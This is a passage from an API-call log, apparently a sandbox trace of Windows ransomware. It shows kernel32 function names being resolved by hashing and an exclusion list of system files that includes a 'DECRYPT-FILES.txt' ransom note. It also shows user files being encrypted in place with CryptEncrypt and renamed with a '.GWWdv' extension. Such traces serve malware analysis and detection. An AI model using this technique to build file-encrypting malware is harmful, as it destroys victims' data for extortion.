returned="DebugBreak" [0082.417] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.417] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.417] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.417] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.417] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.417] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.418] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.418] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.418] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.418] lstrlenA (lpString="DELETEATOM") returned 10 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.418] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.418] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.418] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.418] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.418] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.418] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.418] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.418] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.418] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.418] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.418] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.418] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.418] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.418] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.418] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.419] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.419] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.419] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.419] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.419] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.419] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.419] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.419] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.419] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.419] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.419] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.419] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.419] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.419] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.419] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.419] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.419] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.419] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.419] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.420] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.420] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.420] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.420] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.420] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.420] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.420] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.420] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.420] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.420] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.420] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf") returned 62 [0082.420] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf.GWWdv") returned 68 [0082.420] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qwftzkg5zhln.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf.GWWdv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qwftzkg5zhln.swf.gwwdv"), dwFlags=0x0) returned 1 [0082.421] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.421] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.421] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.422] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9f016e0, ftCreationTime.dwHighDateTime=0x1d4c6f5, ftLastAccessTime.dwLowDateTime=0xc33d4850, ftLastAccessTime.dwHighDateTime=0x1d4d088, ftLastWriteTime.dwLowDateTime=0xc33d4850, ftLastWriteTime.dwHighDateTime=0x1d4d088, nFileSizeHigh=0x0, nFileSizeLow=0x8451, dwReserved0=0x0, dwReserved1=0x0, cFileName="ra6Yg2CQeu7kE3KQ_0.mp3", cAlternateFileName="RA6YG2~1.MP3")) returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="autorun.inf") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="boot.ini") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="desktop.ini") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="ntuser.dat") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="iconcache.db") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="bootsect.bak") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="ntuser.dat.log") returned 1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="thumbs.db") returned -1 [0082.422] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3", lpString2="Bootfont.bin") returned 1 [0082.422] lstrlenW (lpString="ra6Yg2CQeu7kE3KQ_0.mp3") returned 22 [0082.422] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0082.422] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0082.422] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0082.422] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0082.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.422] lstrlenW (lpString="ra6Yg2CQeu7kE3KQ_0.mp3") returned 22 [0082.422] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.422] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ra6Yg2CQeu7kE3KQ_0.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3" [0082.422] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ra6yg2cqeu7ke3kq_0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.423] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=33873) returned 1 [0082.423] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.423] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.423] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.423] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.423] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.423] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.423] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.424] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.424] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.425] CloseHandle (hObject=0x444) returned 1 [0082.425] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.425] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.426] CloseHandle (hObject=0x0) returned 0 [0082.426] CloseHandle (hObject=0x440) returned 1 [0082.426] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.426] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.426] GetTickCount () returned 0x114d144 [0082.426] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.427] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.427] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.428] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.428] lstrlenA (lpString="kernel32.dll") returned 12 [0082.428] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.428] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.428] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.428] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.428] lstrlenA (lpString="ADDATOMA") returned 8 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.428] lstrlenA (lpString="ADDATOMW") returned 8 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.428] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.428] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.428] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.428] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.429] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.429] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.429] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.429] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.429] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.429] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.429] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.429] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.429] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.429] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.429] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.429] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.429] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.429] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.429] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.429] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.429] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.429] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.430] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.430] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.430] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.430] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.430] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.430] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.430] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.430] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.430] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.430] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.430] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.430] lstrlenA 